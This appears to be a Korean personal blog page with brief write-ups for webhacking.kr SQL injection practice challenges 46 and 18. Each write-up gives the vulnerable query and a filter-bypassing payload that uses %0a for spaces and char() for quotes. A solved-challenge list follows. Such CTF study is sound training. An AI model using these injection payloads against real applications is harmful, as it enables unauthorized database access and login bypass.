연습 또 연습.

  • 홈
  • 방명록

write-up 33

46번

쿼리 select id,cash from members where lv=$_GET[lv] lv=1만 반응한다. 곧+--------+-----+---+| id | cash | lv |+--------+-----+---+| zzibong | 10000 | 1 |+--------+-----+---+ id를 admin으로 만들어야하므로?lv=0 or id='admin' 공백은 %0a로, 쿼터는 char함수로 우회해준다. (0x도 필터링됨) ?lv=0%0aor%0aid=char(97,100,109,105,110)

write-up/webhacking.kr 2016.03.28

18번

쿼리select id from challenge18_table where id='guest' and no=$_GET[no] guest의 no값은 1이다. admin으로 로그인해아하는데 추정할 수 있는 table의 형태는 +-----+---+| id | no |+-----+---+| guest | 1 || admin | 2 |+-----+---+ no=0 or no=2를 주면 되는데 공백이 필터링된다 깔끔하게 %0a로 우회해준다. ?no=0%0aor%0ano=2

write-up/webhacking.kr 2016.03.28

webhacking.kr SQL Injection

webhacking.kr SQL Injection 문제 3/28 시작 2 (500)7 (300) - 4/9 클리어8 (350) - 4/1 클리어9 (900) - 7/17 클리어13 (1000) - 8/22 클리어18 (100) - 3/28 클리어21 (250) - 3/28 클리어22 (500) - 8/23 클리어35 (350) - 3/31 클리어40 (500) - 3/31 클리어45 (550) - 4/3 클리어46 (300) - 3/28 클리어49 (300) - 3/28 클리어50 (450) - 3/29 클리어51 (250) - 4/3 클리어53 (350) - 3/31 클리어55 (400) - 4/9 클리어56 (250) - 3/31 클리어57 (600) - 4/3 클리어59 (200) - 7/8 클리어

write-up/webhacking.kr 2016.03.28
1 2 3 4
더보기
  • 분류 전체보기 (172)
    • profile (0)
    • Programming (28)
      • C (6)
      • ruby (2)
      • python (12)
      • PS (3)
    • 웹 (4)
      • PHP (11)
      • Bootstrap (3)
      • MySQL (7)
      • 웹_기타 (6)
      • SQLi (5)
      • XSS (1)
      • JSP,tomcat (2)
    • pwnable (15)
      • Fuzzing (3)
      • Shellcoding (5)
      • arm (1)
    • Kernel (1)
      • Kernel Basics (0)
      • Kernel Exploits (1)
    • Reversing (1)
    • Rails (4)
    • AWS (6)
    • Linux (14)
    • AI (3)
    • write-up (1)
      • pwnable.kr (0)
      • webhacking.kr (19)
      • pythonchallenge.com (2)
      • CTF (2)
      • 라이트업 모음 (0)
      • LoB (1)
      • pwnable (5)
      • ctf.j0n9hyun.xyz (2)
      • pwnable.tw (0)
      • canhack.me (0)
      • knock.xss.moe (1)
    • Docker (3)
    • Android (1)
    • 문서 (4)
      • 시스템 문서 (2)
      • 리버싱 문서 (0)
      • 포렌식 문서 (0)
      • 웹 문서 (1)
      • 기타 문서 (1)
    • 기타 (7)

alkyne Choi

Copyright © Kakao Corp. All rights reserved.

티스토리툴바